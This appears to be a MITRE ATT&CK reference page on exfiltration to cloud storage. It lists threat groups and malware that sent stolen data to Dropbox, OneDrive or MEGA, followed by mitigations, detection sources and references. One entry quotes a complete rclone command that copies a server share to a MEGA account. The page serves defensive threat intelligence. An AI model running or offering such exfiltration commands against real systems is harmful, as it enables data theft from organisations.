Skip to content

T1567.002 Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Item Value
ID T1567.002
Sub-techniques T1567.001, T1567.002, T1567.003
Tactics TA0010
Platforms Linux, Windows, macOS
Version 1.1
Created 09 March 2020
Last Modified 30 August 2022

Procedure Examples

ID Name Description
S0635 BoomBox BoomBox can upload data to dedicated per-victim folders in Dropbox.14
S0651 BoxCaon BoxCaon has the capability to download folders’ contents on the system and upload the results back to its Dropbox drive.7
C0015 C0015 During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.1
G0114 Chimera Chimera has exfiltrated stolen data to OneDrive accounts.24
S0660 Clambling Clambling can send files from a victim’s machine to Dropbox.1011
G0142 Confucius Confucius has exfiltrated victim data to cloud storage service accounts.18
S1023 CreepyDrive CreepyDrive can use cloud services including OneDrive for data exfiltration.4
S0538 Crutch Crutch has exfiltrated stolen data to Dropbox.13
G1006 Earth Lusca Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.19
S0363 Empire Empire can use Dropbox for data exfiltration.3
G0046 FIN7 FIN7 has exfiltrated stolen data to the MEGA file sharing site.15
G0125 HAFNIUM HAFNIUM has exfiltrated data to file sharing sites, including MEGA.17
S0037 HAMMERTOSS HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.12
G1001 HEXANE HEXANE has used cloud services, including OneDrive, for data exfiltration.4
G0094 Kimsuky Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.16
G0065 Leviathan Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.2021
G1014 LuminousMoth LuminousMoth has exfiltrated data to Google Drive.26
S0340 Octopus Octopus has exfiltrated data to file sharing sites.5
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.2728
G1005 POLONIUM POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.4
S0629 RainyDay RainyDay can use a file exfiltration tool to upload specific files to Dropbox.6
S1040 Rclone Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.21
S0240 ROKRAT ROKRAT can send collected data to cloud storage services such as PCloud.89
G0027 Threat Group-3390 Threat Group-3390 has exfiltrated stolen data to Dropbox.10
G0010 Turla Turla has used WebDAV to upload stolen USB files to a cloud drive.22 Turla has also exfiltrated stolen files to OneDrive and 4shared.23
G0128 ZIRCONIUM ZIRCONIUM has exfiltrated stolen data to Dropbox.25

Mitigations

ID Mitigation Description
M1021 Restrict Web-Based Content Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.

Detection

ID Data Source Data Component
DS0017 Command Command Execution
DS0022 File File Access
DS0029 Network Traffic Network Connection Creation

References

  1. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022. 

  2. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022. 

  3. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. 

  4. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. 

  5. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. 

  6. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021. 

  7. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021. 

  8. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022. 

  9. Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021. 

  10. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. 

  11. Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021. 

  12. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. 

  13. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020. 

  14. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. 

  15. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. 

  16. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  17. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. 

  18. Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group’s Cyberespionage Operations. Retrieved December 26, 2021. 

  19. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022. 

  20. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018. 

  21. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. 

  22. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019. 

  23. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. 

  24. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021. 

  25. Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021. 

  26. Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022. 

  27. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021. 

  28. ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.